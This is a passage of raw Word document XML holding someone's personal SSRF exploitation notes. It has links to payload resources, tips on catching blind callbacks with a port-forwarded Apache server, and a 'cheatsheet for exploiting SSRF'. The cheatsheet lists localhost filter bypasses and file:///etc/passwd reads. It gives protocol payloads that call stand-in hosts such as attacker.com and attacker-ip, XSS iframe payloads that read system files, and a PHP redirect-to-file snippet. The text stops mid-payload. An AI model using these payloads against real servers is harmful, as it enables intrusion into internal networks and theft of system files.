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255B5" w14:textId="77777777" w:rsidR="003C3077" w:rsidRDefault="003C3077">
      <w:r>
        <w:t xml:space="preserve">Resources: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC5604" w14:textId="0430A2F7" w:rsidR="00AB2CF7" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00AB2CF7" w:rsidRPr="000A11BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB2CF7">
        <w:t xml:space="preserve"> -&gt; great payload resource </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0213D616" w14:textId="1E1F45DE" w:rsidR="00AB2CF7" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00AB2CF7" w:rsidRPr="000A11BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB2CF7">
        <w:t xml:space="preserve"> -&gt; basic stuff and guide to basic payload construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EC777" w14:textId="11D382EF" w:rsidR="00695BEA" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00CB3042" w:rsidRPr="003F4BC9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CB3042">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A2681" w14:textId="78FD8A8A" w:rsidR="00C430F8" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00C430F8" w:rsidRPr="009814DE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger-labs.net/hackability/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C430F8">
        <w:t xml:space="preserve"> -&gt; can be passed to backend servers to help locate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>vulnerabitities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17744EAE" w14:textId="4DD4ADEB" w:rsidR="00AC5E02" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00AC5E02" w:rsidRPr="00DE2D47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://dzone.com/articles/the-server-side-request-forgery-vulnerability-and</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> -&gt; more great payloads and info on scanning internal </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>network</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD99B43" w14:textId="77777777" w:rsidR="00AC5E02" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00AC5E02" w:rsidRPr="00DE2D47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://vickieli.medium.com/exploiting-ssrfs-b3a29dd7437</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> -&gt; exploiting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>ssrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320FC0A" w14:textId="642BE48D" w:rsidR="00AC5E02" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00AC5E02" w:rsidRPr="00DE2D47">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> -&gt; bypassing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>ssrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> protection **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E30CAEE" w14:textId="63B1B811" w:rsidR="00AC5E02" w:rsidRDefault="003C3077">
      <w:r>
        <w:t xml:space="preserve">Its almost necessary to have a server of some sort to look for incoming connections, as blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is very common.</w:t>
      </w:r>
      <w:r w:rsidR="00C66DA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C66DA3">
        <w:t>Canarytokens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C66DA3">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C66DA3">
        <w:t>requestbins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C66DA3">
        <w:t xml:space="preserve"> can help us ID callbacks see bookmarks in hacking tab.</w:t>
      </w:r>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> Even better we can use our apache2 server on kali box, then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>localhost.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> to forward the ports. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AC5E02">
        <w:t>Final;y</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC5E02">
        <w:t xml:space="preserve"> we navigate to localhost/server-status to see a log of all incoming connections to the server!! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271620C8" w14:textId="4F5CA2C4" w:rsidR="003C3077" w:rsidRDefault="003C3077">
      <w:r>
        <w:t xml:space="preserve">We want to find all parameters or variables that reference an external resource, this could be a request to an external URL or file or many other things (as shown below) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D5A29" w14:textId="5B51390E" w:rsidR="003C3077" w:rsidRDefault="003C3077">
      <w:r>
        <w:t xml:space="preserve">Common payload styles to use when testing: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020CE68A" w14:textId="77777777" w:rsidR="003C3077" w:rsidRPr="003C3077" w:rsidRDefault="003C3077" w:rsidP="003C3077">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SSRF CHEATSHEET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F4EBDD" w14:textId="52DA168D" w:rsidR="003C3077" w:rsidRPr="003C3077" w:rsidRDefault="003C3077" w:rsidP="003C30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3C3077">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elow you will find my </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cheatsheet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for exploiting Server Side Request Forgery (SSRF):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26094BD0" w14:textId="3662430B"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 xml:space="preserve">-------------------------------------------------------------------     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE42D4"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Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314697CF"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Check out parameters such as /file=, /path=, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>= to see if the application can send request only to whitelisted applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A9D0A"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4DED1E" w14:textId="738E5510"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Check out if there is PDF or any other file export tool in place which may be vulnerable to SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E4F44"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C83ECD2"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 xml:space="preserve">__Basic localhost </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Payloads:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C211DB6"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http://127.0.0.1:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DBEC3"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http://localhost:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C0B30"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https://127.0.0.1:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75163429"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https://localhost:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDBEF52"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63790251"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http://0000::1:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345ABC10"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0:0:0:0:0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:ffff:127.0.0.1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED751A"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http://0/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB21E45"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lastRenderedPageBreak/>
        <w:t>http://127.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D620D4" w14:textId="4872B4C9"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http://127.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B648F8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A37EC"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 xml:space="preserve">__File </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>path:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE02CCD"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C23AD08"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file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB1EFCA"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file://path/to/file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7C6030" w14:textId="559ECEDC"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file://\/\/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82EB81"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B917413"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 xml:space="preserve">__With other </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protocols:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161EF04B"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sftp://attacker.com:port/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF53C99"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dict://attacker:port/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A227AC5"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tftp://attacker.com:port/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCB275"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ldap://localhost:port/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F76A00" w14:textId="313493A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gopher://127.0.0.1:port/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA558B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A0A3A3"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 xml:space="preserve">__From </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B2A4DD"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\&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">="xxx" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('\&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=file:///etc/passwd&gt;\&lt;/iframe&gt;')"/&gt;\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8FF1A" w14:textId="491148B5"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 xml:space="preserve">\&lt;link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=attachment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="file:///etc/passwd"&gt;\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F54CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044F378"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 xml:space="preserve">__With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>injection:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D2906"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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> $file = $_GET['file']; header("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>location:file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>://$file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>");?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D73088" w14:textId="371F15D4"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\&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="http://attacker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
